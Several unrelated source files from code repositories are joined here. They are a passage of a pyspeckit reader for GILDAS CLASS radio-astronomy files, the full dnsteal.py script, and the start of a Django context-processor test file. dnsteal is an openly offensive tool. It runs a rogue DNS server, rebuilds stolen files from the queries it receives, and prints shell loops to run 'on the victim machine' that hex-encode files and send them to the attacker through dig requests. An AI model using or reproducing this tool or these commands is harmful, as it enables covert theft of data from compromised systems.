aex = numpy.fromfile(f, count=(record_length_words-15)/2, dtype='int64')
file_description['aex'] = aex[aex!=0]
assert len(file_description['aex']) == file_description['nex']
file_description['version'] = 2
return file_description
def gi8_dicho(ninp,lexn,xval,ceil=True):
"""
! @ public
! Find ival such as
! X(ival-1) < xval <= X(ival) (ceiling mode)
! or
! X(ival) <= xval < X(ival+1) (floor mode)
! for input data ordered. Use a dichotomic search for that.
call gi8_dicho(nex,file%desc%lexn,entry_num,.true.,kex,error)
"""
#integer(kind=size_length), intent(in) :: np ! Number of input points
#integer(kind=8), intent(in) :: x(np) ! Input ordered Values
#integer(kind=8), intent(in) :: xval ! The value we search for
#logical, intent(in) :: ceil ! Ceiling or floor mode?
#integer(kind=size_length), intent(out) :: ival ! Position in the array
#logical, intent(inout) :: error ! Logical error flag
iinf = 1
isup = ninp
#! Ceiling mode
while isup > (iinf+1):
imid = int(np.floor((isup + iinf)/2.))
if (lexn[imid-1] < xval):
iinf = imid
else:
isup = imid
ival = isup
return ival
def _read_obshead(f, file_description, position=None):
if file_description['version'] == 1:
return _read_obshead_v1(f, position=position)
if file_description['version'] == 2:
return _read_obshead_v2(f, position=position)
else:
raise ValueError("Invalid file version {0}.".
format(file_description['version']))
def _read_obshead_v2(f, position=None):
"""
! Version 2 (public)
integer(kind=4), parameter :: entrydescv2_nw1=11 ! Number of words, in 1st part
integer(kind=4), parameter :: entrydescv2_nw2=5 ! Number of words for 1 section in 2nd part
type classic_entrydesc_t
sequence
integer(kind=4) :: code ! 1 : code observation icode
integer(kind=4) :: version ! 2 : observation version
integer(kind=4) :: nsec ! 3 : number of sections
integer(kind=4) :: pad1 ! - : memory padding (not in data)
integer(kind=8) :: nword ! 4- 5: number of words
integer(kind=8) :: adata ! 6- 7: data address
integer(kind=8) :: ldata ! 8- 9: data length
integer(kind=8) :: xnum ! 10-11: entry number
! Out of the 'sequence' block:
integer(kind=4) :: msec ! Not in data: maximum number of sections the
! Observation Index can hold
integer(kind=4) :: pad2 ! Memory padding for 8 bytes alignment
integer(kind=4) :: seciden(classic_maxsec) ! Section Numbers (on disk: 1 to ed%nsec)
integer(kind=8) :: secleng(classic_maxsec) ! Section Lengths (on disk: 1 to ed%nsec)
integer(kind=8) :: secaddr(classic_maxsec) ! Section Addresses (on disk: 1 to ed%nsec)
end type classic_entrydesc_t
"""
if position is not None:
f.seek(position)
else:
position = f.tell()
IDcode = f.read(4)
if IDcode.strip() != '2':
raise IndexError("Observation Header reading failure at {0}. "
"Record does not appear to be an observation header.".
format(position))
f.seek(position)
entrydescv2_nw1=11
entrydescv2_nw2=5
obshead = {
'CODE': f.read(4),
'VERSION': _read_int32(f),
'NSEC': _read_int32(f),
#'_blank': _read_int32(f),
'NWORD': _read_int64(f),
'ADATA': _read_int64(f),
'LDATA': _read_int64(f),
'XNUM': _read_int64(f),
#'MSEC': _read_int32(f),
#'_blank2': _read_int32(f),
}
section_numbers = np.fromfile(f, count=obshead['NSEC'], dtype='int32')
section_lengths = np.fromfile(f, count=obshead['NSEC'], dtype='int64')
section_addresses = np.fromfile(f, count=obshead['NSEC'], dtype='int64')
return obshead['XNUM'],obshead,dict(zip(section_numbers,section_addresses))
def _read_obshead_v1(f, position=None, verbose=False):
"""
Read the observation header of a CLASS file
(helper function for read_class; should not be used independently)
"""
if position is not None:
f.seek(position)
IDcode = f.read(4)
if IDcode.strip() != '2':
raise IndexError("Observation Header reading failure at {0}. "
"Record does not appear to be an observation header.".
format(f.tell() - 4))
(nblocks, nbyteob, data_address, nheaders, data_length, obindex, nsec,
obsnum) = numpy.fromfile(f, count=8, dtype='int32')
if verbose:
print("nblocks,nbyteob,data_address,data_length,nheaders,obindex,nsec,obsnum",nblocks,nbyteob,data_address,data_length,nheaders,obindex,nsec,obsnum)
print("DATA_LENGTH: ",data_length)
seccodes = numpy.fromfile(f,count=nsec,dtype='int32')
# Documentation says addresses then length: It is apparently wrong
seclen = numpy.fromfile(f,count=nsec,dtype='int32')
secaddr = numpy.fromfile(f,count=nsec,dtype='int32')
if verbose: print("Section codes, addresses, lengths: ",seccodes,secaddr,seclen)
hdr = {'NBLOCKS':nblocks, 'NBYTEOB':nbyteob, 'DATAADDR':data_address,
'DATALEN':data_length, 'NHEADERS':nheaders, 'OBINDEX':obindex,
'NSEC':nsec, 'OBSNUM':obsnum}
#return obsnum,seccodes
return obsnum,hdr,dict(zip(seccodes,secaddr))
# THIS IS IN READ_OBSHEAD!!!
# def _read_preheader(f):
# """
# Not entirely clear what this is, but it is stuff that precedes the actual data
#
# Looks something like this:
# array([ 1, -2, -3, -4, -14,
# 9, 17, 18, 25, 55,
# 64, 81, 99, -1179344801, 979657591,
#
# -2, -3, -4, -14 indicate the 4 header types
# 9,17,18,25 *MAY* indicate the number of bytes in each
#
#
# HOW is it indicated how many entries there are?
# """
# # 13 comes from counting 1, -2,....99 above
# numbers = np.fromfile(f, count=13, dtype='int32')
# sections = [n for n in numbers if n in header_id_numbers]
# return sections
def downsample_1d(myarr,factor,estimator=np.mean, weight=None):
"""
Downsample a 1D array by averaging over *factor* pixels.
Crops right side if the shape is not a multiple of factor.
This code is pure numpy and should be fast.
keywords:
estimator - default to mean. You can downsample by summing or
something else if you want a different estimator
(e.g., downsampling error: you want to sum & divide by sqrt(n))
weight: np.ndarray
An array of weights to use for the downsampling. If None,
assumes uniform 1
"""
if myarr.ndim != 1:
raise ValueError("Only works on 1d data. Says so in the title.")
xs = myarr.size
crarr = myarr[:xs-(xs % int(factor))]
if weight is None:
dsarr = estimator(np.concatenate([[crarr[i::factor] for i in
range(factor)]]),axis=0)
else:
dsarr = estimator(np.concatenate([[crarr[i::factor]*weight[i::factor] for i in
range(factor)]]),axis=0)
warr = estimator(np.concatenate([[weight[i::factor] for i in
range(factor)]]),axis=0)
dsarr = dsarr/warr
return dsarr
# unit test
def test_downsample1d():
data = np.arange(10)
weight = np.ones(10)
weight[5]=0
assert np.all(downsample_1d(data, 2, weight=weight, estimator=np.mean) ==
np.array([ 0.5, 2.5, 4. , 6.5, 8.5]))
def read_observation(f, obsid, file_description=None, indices=None,
my_memmap=None, memmap=True):
if isinstance(f, str):
f = open(f,'rb')
opened = True
if memmap:
my_memmap = numpy.memmap(filename, offset=0, dtype='float32',
mode='r')
else:
my_memmap = None
elif my_memmap is None and memmap:
raise ValueError("Must pass in a memmap object if passing in a file object.")
else:
opened = False
if file_description is None:
file_description = _read_first_record(f)
if indices is None:
indices = _read_indices(f, file_description)
index = indices[obsid]
obs_position = (index['BLOC']-1)*file_description['reclen']*4 + (index['WORD']-1)*4
obsnum,obshead,sections = _read_obshead(f, file_description,
position=obs_position)
header = obshead
datastart = 0
for section_id,section_address in iteritems(sections):
# Section addresses are 1-indexed byte addresses
# in the current "block"
sec_position = obs_position + (section_address-1)*4
temp_hdr = _read_header(f, type=header_id_numbers[section_id],
position=sec_position)
header.update(temp_hdr)
datastart = max(datastart,f.tell())
hdr = header
hdr.update(obshead) # re-overwrite things
hdr.update({'OBSNUM':obsnum,'RECNUM':obsid})
hdr.update({'RA':hdr['LAM']/pi*180,'DEC':hdr['BET']/pi*180})
hdr.update({'RAoff':hdr['LAMOF']/pi*180,'DECoff':hdr['BETOF']/pi*180})
hdr.update({'OBJECT':hdr['SOURC'].strip()})
hdr.update({'BUNIT':'Tastar'})
hdr.update({'EXPOSURE':float(hdr['TIME'])})
hdr['HDRSTART'] = obs_position
hdr['DATASTART'] = datastart
hdr.update(indices[obsid])
# Apparently the data are still valid in this case?
#if hdr['XNUM'] != obsid+1:
# log.error("The spectrum read was {0} but {1} was requested.".
# format(hdr['XNUM']-1, obsid))
if hdr['KIND'] == 1: # continuum
nchan = hdr['NPOIN']
elif 'NCHAN' in hdr:
nchan = hdr['NCHAN']
else:
log.error("No NCHAN in header. This is not a spectrum.")
import ipdb; ipdb.set_trace()
# There may be a 1-channel offset? CHECK!!!
# (changed by 1 pixel - October 14, 2014)
# (changed back - October 21, 2014 - I think the ends are just bad, but not
# zero.)
f.seek(datastart-1)
spec = _read_spectrum(f, position=datastart-1, nchan=nchan,
memmap=memmap, my_memmap=my_memmap)
if opened:
f.close()
return spec, hdr
def _read_spectrum(f, position, nchan, my_memmap=None, memmap=True):
if position != f.tell():
log.warn("Reading data from {0}, but the file is wound "
"to {1}.".format(position, f.tell()))
if memmap:
here = position
#spectrum = numpy.memmap(filename, offset=here, dtype='float32',
# mode='r', shape=(nchan,))
spectrum = my_memmap[here/4:here/4+nchan]
f.seek(here+nchan*4)
else:
f.seek(position)
spectrum = numpy.fromfile(f,count=nchan,dtype='float32')
return spectrum
def _spectrum_from_header(fileobj, header, memmap=None):
return _read_spectrum(fileobj, position=header['DATASTART'],
nchan=header['NCHAN'] if 'NCHAN' in hdr else hdr['NPOIN'],
my_memmap=memmap)
def clean_header(header):
newheader = {}
for k in header:
if not isinstance(header[k], (int, float, str)):
if isinstance(header[k], np.ndarray) and header[k].size > 1:
if header[k].size > 10:
raise ValueError("Large array being put in header. That's no good. key={0}".format(k))
for ii,val in enumerate(header[k]):
newheader[k[:7]+str(ii)] = val
else:
newheader[k[:8]] = str(header[k])
else:
newheader[k[:8]] = header[k]
return newheader
class ClassObject(object):
def __init__(self, filename, verbose=False):
t0 = time.time()
self._file = open(filename, 'rb')
self.file_description = _read_first_record(self._file)
self.allind = _read_indices(self._file, self.file_description)
self._data = np.memmap(self._file, dtype='float32', mode='r')
if verbose: log.info("Setting _spectra")
self._spectra = LazyItem(self)
t1 = time.time()
if verbose: log.info("Setting posang. t={0}".format(t1-t0))
self.set_posang()
t2 = time.time()
if verbose: log.info("Identifying otf scans. t={0}".format(t2-t1))
self._identify_otf_scans(verbose=verbose)
t3 = time.time()
#self._load_all_spectra()
if verbose:
log.info("Loaded CLASS object with {3} indices. Time breakdown:"
" {0}s for indices, "
"{1}s for posang, and {2}s for OTF scan identification"
.format(t1-t0, t2-t1, t3-t2, len(self.allind)))
def __repr__(self):
s = "\n".join(["{k}: {v}".format(k=k,v=v)
for k,v in iteritems(self.getinfo())])
return "ClassObject({id}) with {nspec} entries\n".format(id=id(self),
nspec=len(self.allind)) + s
def getinfo(self, allsources=False):
info = dict(
tels = self.tels,
lines = self.lines,
scans = self.scans,
sources = self.sources if allsources else self.sci_sources,
)
return info
def set_posang(self):
h0 = self.headers[0]
for h in self.headers:
dx = h['OFF1'] - h0['OFF1']
dy = h['OFF2'] - h0['OFF2']
h['COMPPOSA'] = np.arctan2(dy,dx)*180/np.pi
h0 = h
def _identify_otf_scans(self, verbose=False):
h0 = self.allind[0]
st = 0
otfscan = 0
posangs = [h['COMPPOSA'] for h in self.allind]
if verbose:
pb = ProgressBar(len(self.allind))
for ii,h in enumerate(self.allind):
if (h['SCAN'] != h0['SCAN']
or h['SOURC'] != h0['SOURC']):
h0['FIRSTSCAN'] = st
cpa = np.median(posangs[st:ii])
for hh in self.allind[st:ii]:
hh['SCANPOSA'] = cpa % 180
st = ii
if h['SCAN'] == h0['SCAN']:
h0['OTFSCAN'] = otfscan
otfscan += 1
h['OTFSCAN'] = otfscan
else:
otfscan = 0
h['OTFSCAN'] = otfscan
else:
h['OTFSCAN'] = otfscan
if verbose:
pb.update(ii)
def listscans(self, source=None, telescope=None, out=sys.stdout):
minid=0
scan = -1
sourc = ""
#tel = ''
minoff1,maxoff1 = np.inf,-np.inf
minoff2,maxoff2 = np.inf,-np.inf
ttlangle,nangle = 0.0,0
print("{entries:15s} {SOURC:12s} {XTEL:12s} {SCAN:>8s} {SUBSCAN:>8s} "
"[ {RAmin:>12s}, {RAmax:>12s} ] "
"[ {DECmin:>12s}, {DECmax:>12s} ] "
"{angle:>12s} {SCANPOSA:>12s} {OTFSCAN:>8s} {TSYS:>8s} {UTD:>12s}"
.format(entries='Scans', SOURC='Source', XTEL='Telescope',
SCAN='Scan', SUBSCAN='Subscan',
RAmin='min(RA)', RAmax='max(RA)',
DECmin='min(DEC)', DECmax='max(DEC)',
SCANPOSA='Scan PA',
angle='Angle', OTFSCAN='OTFscan',
TSYS='TSYS', UTD='UTD'),
file=out)
data_rows = []
for ii,row in enumerate(self.headers):
if (row['SCAN'] == scan
and row['SOURC'] == sourc
#and row['XTEL'] == tel
):
minoff1 = min(minoff1, row['OFF1'])
maxoff1 = max(maxoff1, row['OFF1'])
minoff2 = min(minoff2, row['OFF2'])
maxoff2 = max(maxoff2, row['OFF2'])
ttlangle += np.arctan2(row['OFF2'] - prevrow['OFF2'],
row['OFF1'] - prevrow['OFF1'])%np.pi
nangle += 1
prevrow = row
else:
if scan == -1:
scan = row['SCAN']
sourc = row['SOURC']
#tel = row['XTEL']
prevrow = row
continue
ok = True
if source is not None:
if isinstance(source, (list,tuple)):
ok = ok and any(re.search((s), prevrow['SOURC'])
for s in source)
else:
ok = ok and re.search((source), prevrow['SOURC'])
if telescope is not None:
ok = ok and re.search((telescope), prevrow['XTEL'])
if ok:
data = dict(RAmin=minoff1*180/np.pi*3600,
RAmax=maxoff1*180/np.pi*3600,
DECmin=minoff2*180/np.pi*3600,
DECmax=maxoff2*180/np.pi*3600,
angle=(ttlangle/nangle)*180/np.pi if nangle>0 else 0,
e0=minid,
e1=ii-1,
#TSYS=row['TSYS'] if 'TSYS' in row else '--',
UTD=row['DOBS']+row['UT'] if 'UT' in row else -99,
**prevrow)
print("{e0:7d}-{e1:7d} {SOURC:12s} {XTEL:12s} {SCAN:8d} {SUBSCAN:8d} "
"[ {RAmin:12f}, {RAmax:12f} ] "
"[ {DECmin:12f}, {DECmax:12f} ] "
"{angle:12.1f} {SCANPOSA:12.1f} {OTFSCAN:8d}"
" {TSYS:>8.1f} {UTD:12f}".
format(**data),
file=out)
data_rows.append(data)
minoff1,maxoff1 = np.inf,-np.inf
minoff2,maxoff2 = np.inf,-np.inf
ttlangle,nangle = 0.0,0
scan = row['SCAN']
sourc = row['SOURC']
#tel = row['XTEL']
minid = ii
return data
@property
def tels(self):
if hasattr(self,'_tels'):
return self._tels
else:
self._tels = set([h['XTEL'] for h in self.allind])
return self._tels
@property
def sources(self):
if hasattr(self,'_source'):
return self._source
else:
self._source = set([h['SOURC'] for h in self.allind])
return self._source
@property
def scans(self):
if hasattr(self,'_scan'):
return self._scan
else:
self._scan = set([h['SCAN'] for h in self.allind])
return self._scan
@property
def sci_sources(self):
return set([s for s in self.sources
if s[:4] not in ('SKY-', 'TSYS', 'TCAL', 'TREC', 'HOT-',
'COLD')])
@property
def lines(self):
if hasattr(self,'_lines'):
return self._lines
else:
self._lines = set([h['LINE'] for h in self.allind])
return self._lines
def _load_all_spectra(self, indices=None):
if indices is None:
indices = range(self.file_description['xnext']-1)
if hasattr(self, '_loaded_indices'):
indices_set = set(indices)
indices_to_load = (indices_set.difference(self._loaded_indices))
self._loaded_indices = self._loaded_indices.union(indices_set)
if any(indices_to_load):
pb = ProgressBar(len(indices_to_load))
for ii,k in enumerate(xrange(indices_to_load)):
self._spectra[k]
pb.update(ii)
else:
self._loaded_indices = set(indices)
self._spectra.load_all()
@property
def spectra(self):
return [x[0] for x in self._spectra]
@property
def headers(self):
return [self._spectra[ii][1]
if ii in self._spectra else x
for ii,x in enumerate(self.allind)]
def select_spectra(self,
all=None,
line=None,
linere=None,
linereflags=re.IGNORECASE,
number=None,
scan=None,
offset=None,
source=None,
sourcere=None,
sourcereflags=re.IGNORECASE,
range=None,
quality=None,
telescope=None,
telescopere=None,
telescopereflags=re.IGNORECASE,
subscan=None,
entry=None,
posang=None,
#observed=None,
#reduced=None,
frequency=None,
section=None,
user=None,
include_old_versions=False,
):
"""
Parameters
----------
include_old_versions: bool
Include spectra with XVER numbers <0? These are CLASS spectra that
have been "overwritten" (re-reduced?)
"""
if entry is not None and len(entry)==2:
return irange(entry[0], entry[1])
if frequency is not None:
self._load_all_spectra()
sel = [(re.search(re.escape(line), h['LINE'], re.IGNORECASE)
if line is not None else True) and
(re.search(linere, h['LINE'], linereflags)
if linere is not None else True) and
(h['SCAN'] == scan if scan is not None else True) and
((h['OFF1'] == offset or
h['OFF2'] == offset) if offset is not None else True) and
(re.search(re.escape(source), h['CSOUR'], re.IGNORECASE)
if source is not None else True) and
(re.search(sourcere, h['CSOUR'], sourcereflags)
if sourcere is not None else True) and
(h['OFF1']>range[0] and h['OFF1'] < range[1] and
h['OFF2']>range[2] and h['OFF2'] < range[3]
if range is not None and len(range)==4 else True) and
(h['QUAL'] == quality if quality is not None else True) and
(re.search(re.escape(telescope), h['CTELE'], re.IGNORECASE)
if telescope is not None else True) and
(re.search(telescopere, h['CTELE'], telescopereflags)
if telescopere is not None else True) and
(h['SUBSCAN']==subscan if subscan is not None else True) and
(h['NUM'] >= number[0] and h['NUM'] < number[1]
if number is not None else True) and
('RESTF' in h and # Need to check that it IS a spectrum: continuum data can't be accessed this way
h['RESTF'] > frequency[0] and
h['RESTF'] < frequency[1]
if frequency is not None and len(frequency)==2
else True) and
(h['COMPPOSA']%180 > posang[0] and
h['COMPPOSA']%180 < posang[1]
if posang is not None and len(posang)==2
else True) and
(h['XVER'] > 0 if not include_old_versions else True)
for h in self.headers
]
return [ii for ii,k in enumerate(sel) if k]
def get_spectra(self, progressbar=True, **kwargs):
selected_indices = self.select_spectra(**kwargs)
if not any(selected_indices):
raise ValueError("Selection yielded empty.")
self._spectra.load(selected_indices, progressbar=progressbar)
return [self._spectra[ii] for ii in selected_indices]
def get_pyspeckit_spectra(self, progressbar=True, **kwargs):
spdata = self.get_spectra(progressbar=progressbar, **kwargs)
spectra = [pyspeckit.Spectrum(data=data,
xarr=make_axis(header),
header=clean_header(header))
for data,header in spdata]
return spectra
def read_observations(self, observation_indices, progressbar=True):
self._spectra.load(observation_indices, progressbar=progressbar)
return [self._spectra[ii] for ii in observation_indices]
@print_timing
def read_class(filename, downsample_factor=None, sourcename=None,
telescope=None, posang=None, verbose=False,
flag_array=None):
"""
Read a binary class file.
Based on the
`GILDAS CLASS file type Specification
<http://iram.fr/IRAMFR/GILDAS/doc/html/class-html/node58.html>`_
Parameters
----------
filename: str
downsample_factor: None or int
Factor by which to downsample data by averaging. Useful for
overresolved data.
sourcename: str or list of str
Source names to match to the data (uses regex)
telescope: str or list of str
'XTEL' or 'TELE' parameters: the telescope & instrument
flag_array: np.ndarray
An array with the same shape as the data used to flag out
(remove) data when downsampling. True = flag out
"""
classobj = ClassObject(filename)
if not isinstance(sourcename, (list,tuple)):
sourcename = [sourcename]
if not isinstance(telescope, (list,tuple)):
telescope = [telescope]
spectra,headers = [],[]
if verbose:
log.info("Reading...")
selection = [ii
for source in sourcename
for tel in telescope
for ii in classobj.select_spectra(sourcere=source,
telescope=tel,
posang=posang)]
sphdr = classobj.read_observations(selection)
if len(sphdr) == 0:
return None
spec,hdr = zip(*sphdr)
spectra += spec
headers += hdr
indexes = headers
weight = ~flag_array if flag_array is not None else None
if downsample_factor is not None:
if verbose:
log.info("Downsampling...")
spectra = [downsample_1d(spec, downsample_factor,
weight=weight)
for spec in ProgressBar(spectra)]
headers = [downsample_header(h, downsample_factor)
for h in ProgressBar(headers)]
return spectra,headers,indexes
def downsample_header(hdr, downsample_factor):
for k in ('NCHAN','NPOIN','DATALEN'):
if k in hdr:
hdr[k] = hdr[k] / downsample_factor
# maybe wrong? h['RCHAN'] = (h['RCHAN']-1) / downsample_factor + 1
scalefactor = 1./downsample_factor
hdr['RCHAN'] = (hdr['RCHAN']-1)*scalefactor + 0.5 + scalefactor/2.
for kw in ['FRES','VRES']:
if kw in hdr:
hdr[kw] *= downsample_factor
return hdr
def make_axis(header,imagfreq=False):
"""
Create a :class:`pyspeckit.spectrum.units.SpectroscopicAxis` from the CLASS "header"
"""
from .. import units
rest_frequency = header.get('RESTF')
xunits = 'MHz'
nchan = header.get('NCHAN')
voff = header.get('VOFF')
foff = header.get('FOFF')
doppler = header.get('DOPPLER')
fres = header.get('FRES')
refchan = header.get('RCHAN')
imfreq = header.get('IMAGE')
if foff in (None, 0.0) and voff not in (None, 0.0):
# Radio convention
foff = -voff/2.997924580e5 * rest_frequency
if not imagfreq:
xarr = rest_frequency + foff + (numpy.arange(1, nchan+1) - refchan) * fres
XAxis = units.SpectroscopicAxis(xarr,unit='MHz',refX=rest_frequency*u.MHz)
else:
xarr = imfreq - (numpy.arange(1, nchan+1) - refchan) * fres
XAxis = units.SpectroscopicAxis(xarr,unit='MHz',refX=imfreq*u.MHz)
return XAxis
@print_timing
def class_to_obsblocks(filename, telescope, line, datatuple=None, source=None,
imagfreq=False, DEBUG=False, **kwargs):
"""
Load an entire CLASS observing session into a list of ObsBlocks based on
matches to the 'telescope', 'line' and 'source' names
Parameters
----------
filename : string
The Gildas CLASS data file to read the spectra from.
telescope : list
List of telescope names to be matched.
line : list
List of line names to be matched.
source : list (optional)
List of source names to be matched. Defaults to None.
imagfreq : bool
Create a SpectroscopicAxis with the image frequency.
"""
if datatuple is None:
spectra,header,indexes = read_class(filename,DEBUG=DEBUG, **kwargs)
else:
spectra,header,indexes = datatuple
obslist = []
lastscannum = -1
spectrumlist = None
for sp,hdr,ind in zip(spectra,header,indexes):
hdr.update(ind)
# this is slow but necessary...
H = pyfits.Header()
for k,v in iteritems(hdr):
if hasattr(v,"__len__") and not isinstance(v,str):
if len(v) > 1:
for ii,vv in enumerate(v):
H.update(k[:7]+str(ii),vv)
else:
H.update(k,v[0])
elif pyfits.Card._comment_FSC_RE.match(str(v)) is not None:
H.update(k,v)
scannum = hdr['SCAN']
if 'XTEL' in hdr and hdr['XTEL'].strip() not in telescope:
continue
if hdr['LINE'].strip() not in line:
continue
if (source is not None) and (hdr['SOURC'].strip() not in source):
continue
hdr.update({'RESTFREQ':hdr.get('RESTF')})
H.update('RESTFREQ',hdr.get('RESTF'))
#print "Did not skip %s,%s. Scannum, last: %i,%i" % (hdr['XTEL'],hdr['LINE'],scannum,lastscannum)
if scannum != lastscannum:
lastscannum = scannum
if spectrumlist is not None:
obslist.append(pyspeckit.ObsBlock(spectrumlist))
xarr = make_axis(hdr,imagfreq=imagfreq)
spectrumlist = [(
pyspeckit.Spectrum(xarr=xarr,
header=H,
data=sp))]
else:
spectrumlist.append(
pyspeckit.Spectrum(xarr=xarr,
header=H,
data=sp))
return obslist
class LazyItem(object):
"""
Simple lazy spectrum-retriever wrapper
"""
def __init__(self, parent):
self.parent = parent
self.sphdr = {}
self.nind = len(self.parent.allind)
self.nloaded = 0
def __repr__(self):
return ("Set of {0} spectra & headers, {1} loaded"
" ({2:0.2f}%)".format(self.nind, self.nloaded,
(float(self.nloaded)/self.nind)*100))
def load_all(self, progressbar=True):
self.load(range(self.nind))
def load(self, indices, progressbar=True):
pb = ProgressBar(len(indices))
counter = 0
for k in indices:
self[k]
counter += 1
pb.update(counter)
def __getitem__(self, key):
if key in self.sphdr:
return self.sphdr[key]
elif isinstance(key, slice):
return [self[k] for k in xrange(key.start or 0,
key.end or len(self.parent.allind),
key.step or 1)]
else:
sphd = read_observation(self.parent._file, key,
file_description=self.parent.file_description,
indices=self.parent.allind,
my_memmap=self.parent._data)
# Update the header with OTFSCAN and POSANG info
sphd[1].update(self.parent.allind[key])
self.sphdr[key] = sphd
self.nloaded += 1
return sphd
def __iter__(self):
return self.next()
def __next__(self):
for k in self.spheader:
yield self.spheader[k]
def __contains__(self, key):
return key in self.sphdr
@print_timing
def class_to_spectra(filename, datatuple=None, **kwargs):
"""
Load each individual spectrum within a CLASS file into a list of Spectrum
objects
"""
if datatuple is None:
spectra,header,indexes = read_class(filename, **kwargs)
else:
spectra,header,indexes = datatuple
spectrumlist = []
for sp,hdr,ind in zip(spectra,header,indexes):
hdr.update(ind)
xarr = make_axis(hdr)
spectrumlist.append(
pyspeckit.Spectrum(xarr=xarr,
header=hdr,
data=sp))
return pyspeckit.Spectra(spectrumlist)
def tests():
"""
Tests are specific to the machine on which this code was developed.
"""
fn1 = '/Users/adam/work/bolocam/hht/class_003.smt'
#fn1 = '/Users/adam/work/bolocam/hht/class_001.smt'
#fn1 = '/Users/adam/work/bolocam/hht/test_SMT-F1M-VU-20824-073.cls'
#fn2 = '/Users/adam/work/bolocam/hht/test_SMT-F1M-VU-79472+203.cls'
#F1 = read_class(fn1)#,DEBUG=True)
#F2 = read_class(fn2)
n2hp = class_to_obsblocks(fn1,telescope=['SMT-F1M-HU','SMT-F1M-VU'],line=['N2HP(3-2)','N2H+(3-2)'])
hcop = class_to_obsblocks(fn1,telescope=['SMT-F1M-HL','SMT-F1M-VL'],line=['HCOP(3-2)','HCO+(3-2)'])
| mit |
geminas/dnsteal | dnsteal.py | 12 | 3710 | #!/usr/bin/env python
# ~ \x90
######################
import socket
import sys
import binascii
import time
import random
import hashlib
import zlib
c = { "r" : "\033[1;31m", "g": "\033[1;32m", "y" : "\033[1;33m", "e" : "\033[0m" }
VERSION = "1.0"
class DNSQuery:
def __init__(self, data):
self.data = data
self.data_text = ''
tipo = (ord(data[2]) >> 3) & 15 # Opcode bits
if tipo == 0: # Standard query
ini=12
lon=ord(data[ini])
while lon != 0:
self.data_text += data[ini+1:ini+lon+1]+'.'
ini += lon+1
lon=ord(data[ini])
def request(self, ip):
packet=''
if self.data_text:
packet+=self.data[:2] + "\x81\x80"
packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' # Questions and Answers Counts
packet+=self.data[12:] # Original Domain Name Question
packet+='\xc0\x0c' # Pointer to domain name
packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # Response type, ttl and resource data length -> 4 bytes
packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # 4bytes of IP
return packet
def save_to_file(r_data, z):
print "\n"
for key,value in r_data.iteritems():
fname = "recieved_%s" % key
flatdata = ""
for block in value:
flatdata += block
if (z):
print "%s[ Info ]%s Unzipping data." % (c["y"], c["e"])
x = zlib.decompressobj(16+zlib.MAX_WBITS)
flatdata = x.decompress(binascii.unhexlify(flatdata))
print "%s[ Info ]%s Saving recieved bytes to './%s'" % (c["y"], c["e"], fname)
f = open(fname, "wb")
if (z):
f.write(flatdata)
else:
f.write(binascii.unhexlify(flatdata))
f.close()
print "%s[md5sum]%s '%s'" % (c["g"], c["e"], hashlib.md5(open(fname, "r").read()).hexdigest())
def banner():
print "\033[1;31m",
print """
___ _ _ ___ _ _
| \| \| / __| |_ ___ __ _| |
| |) | .` \__ \ _/ -_) _` | |
|___/|_|\_|___/\__\___\__,_|_|v%s
-- https://github.com/m57/dnsteal.git --\033[0m
Stealthy file extraction via DNS requests
""" % VERSION
if __name__ == '__main__':
z = False
try:
ip = sys.argv[1]
if "-z" in sys.argv:
z = True
except:
banner()
print "Usage: python %s [listen_address] [-z (optional: unzip incoming data)]" % sys.argv[0]
exit(1)
banner()
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.bind((ip,53))
print "%s[+]%s DNS listening on '%s:53'" % (c["g"], c["e"], ip)
print "%s[+]%s Now on the victim machine, use any of the following commands (or similar):" % (c["y"], c["e"])
print "\t%s[\x23]%s for b in $(xxd -p /path/to/file); do dig +short @%s $b.filename.com; done" % (c["r"], c["e"], ip )
print "\t%s[\x23]%s for b in $(gzip -c /path/to/file | xxd -p); do dig +short @%s $b.filename.com; done\n" % (c["r"], c["e"], ip)
print "\t%s[\x23]%s for f in $(ls *); do for b in $(xxd -p $f); do dig +short @%s $b.$f.com; done; done" % (c["r"], c["e"], ip)
print "\t%s[\x23]%s for f in $(ls *); do for b in $(gzip -c $f | xxd -p); do dig +short @%s $b.$f.com; done; done\n" % (c["r"], c["e"], ip)
print "%s[+]%s Once files have sent, use Ctrl+C to exit and save.\n" % (c["g"], c["e"])
file_seed = random.randint(1,32768)
try:
r_data = {}
while 1:
data, addr = udp.recvfrom(1024)
p=DNSQuery(data)
udp.sendto(p.request(ip), addr)
print 'Request: %s -> %s' % (p.data_text, ip)
fname = p.data_text.split(".")[1]
if fname not in r_data:
r_data[fname] = []
r_data[fname].append(p.data_text.split(".")[0])
except KeyboardInterrupt:
save_to_file(r_data, z)
print '\n\033[1;31m[!]\033[0m Closing...'
udp.close()
| gpl-2.0 |
aparo/django-nonrel | tests/regressiontests/context_processors/tests.py | 50 | 4683 | """
Tests for Django's bundled context processors.
"""
from django.conf import settings
from django.contrib.auth import authenticate
from django.db.models import Q
from django.test import TestCase
from django.template import Template
class RequestContextProcessorTests(TestCase):
"""
Tests for the ``django.core.context_processors.request`` processor.
"""
urls = 'regressiontests.context_processors.urls'
def test_request_attributes(self):
"""
Test that the request object is available in the template and that its
attributes can't be overridden by GET and POST parameters (#3828).
"""
url = '/request_attrs/'
# We should have the request object in the template.
response = self.client.get(url)
self.assertContains(response, 'Have request')
# Test is_secure.
response = self.client.get(url)
self.assertContains(response, 'Not secure')
response = self.client.get(url, {'is_secure': 'blah'})
self.assertContains(response, 'Not secure')
response = self.client.post(url, {'is_secure': 'blah'})
self.assertContains(response, 'Not secure')
# Test path.
response = self.client.get(url)
self.assertContains(response, url)
response = self.client.get(url, {'path': '/blah/'})
self.assertContains(response, url)
response = self.client.post(url, {'path': '/blah/'})
self.assertContains(response, url)
class AuthContextProcessorTests(TestCase):
"""
Tests for the ``django.contrib.auth.context_processors.auth`` processor
"""
urls = 'regressiontests.context_processors.urls'
fixtures = ['context-processors-users.xml']
def test_session_not_accessed(self):
"""
Tests that the session is not accessed simply by including
the auth context processor
"""
response = self.client.get('/auth_processor_no_attr_access/')
self.assertContains(response, "Session not accessed")
def test_session_is_accessed(self):
"""
Tests that the session is accessed if the auth context processor
is used and relevant attributes accessed.
"""
response = self.client.get('/auth_processor_attr_access/')
self.assertContains(response, "Session accessed")
def test_perms_attrs(self):
self.client.login(username='super', password='secret')
response = self.client.get('/auth_processor_perms/')
self.assertContains(response, "Has auth permissions")
